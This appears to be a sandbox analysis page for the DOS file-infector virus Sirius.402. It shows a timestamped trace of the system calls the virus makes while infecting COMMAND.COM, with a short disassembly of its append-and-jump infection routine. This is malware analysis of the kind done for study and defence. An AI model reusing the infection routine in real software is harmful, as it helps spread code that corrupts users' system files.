Sample viewer

vx.netlux.org/Virus.DOS.Sirius.402

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:23.965799325Z 47 PC: 14117 | Get disk transfer address
2018-12-17T22:54:23.978464213Z 26 PC: 14129 | Set disk transfer address
2018-12-17T22:54:23.979950769Z 25 PC: 14138 | Get default drive
2018-12-17T22:54:23.981476583Z 14 PC: 14142 | Set default drive (Drive = 'C')
2018-12-17T22:54:23.983795441Z 78 PC: 1414f | Find first file
2018-12-17T22:54:23.989797975Z 67 PC: 1417c | Get or set file attributes
2018-12-17T22:54:23.99488659Z 67 PC: 14189 | Get or set file attributes
2018-12-17T22:54:24.345361907Z 61 PC: 14191 | Open file (Filename = 'COMMAND.COM')
2018-12-17T22:54:24.351661422Z 87 PC: 14198 | Get or set file date and time
2018-12-17T22:54:24.353115709Z 44 PC: 141a6 | Get time 0x141a6: or dl, dl
0x141a8: je 0x141a2
0x141aa: mov byte ptr [bp + 0x18c], dl
0x141ae: mov ah, 0x3f
0x141b0: lea dx, word ptr [bp + 0x15a]
0x141b4: mov cx, 3
0x141b7: int 0x21
0x141b9: mov ax, 0x4202
0x141bc: sub cx, cx
0x141be: sub dx, dx
0x141c0: int 0x21
0x141c2: sub ax, 3
0x141c5: mov word ptr cs:[0xfb2d], ax
0x141c9: mov byte ptr cs:[0xfb2c], 0xe9
0x141cf: lea si, word ptr [bp - 3]
0x141d2: nop
0x141d3: mov di, 0xfcbc
0x141d6: mov cx, 0x192
0x141d9: cld
0x141da: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:54:24.356061089Z 63 PC: 141b9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:24.358699797Z 66 PC: 141c2 | Move file pointer
2018-12-17T22:54:24.360223562Z 64 PC: 141ec | Write file or device (Write 402 bytes on handle 5)
2018-12-17T22:54:24.367860022Z 66 PC: 141f5 | Move file pointer
2018-12-17T22:54:24.3710364Z 64 PC: 141ff | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:24.373731758Z 87 PC: 14214 | Get or set file date and time
2018-12-17T22:54:24.375385432Z 62 PC: 14218 | Close file
2018-12-17T22:54:24.382157954Z 67 PC: 14225 | Get or set file attributes
2018-12-17T22:54:24.391087316Z 26 PC: 14234 | Set disk transfer address
2018-12-17T22:54:24.392409273Z 14 PC: 1423e | Set default drive (Drive = 'A')
2018-12-17T22:54:24.394513131Z 9 PC: 12a47 | Display string (String= 'GOAT File Generator 1.00 � (c) 1994-96 by ROSE, Ralph Roth! (16.12.1996) File: ROSE007.COM - 5.800 (16A8h) Bytes length! ')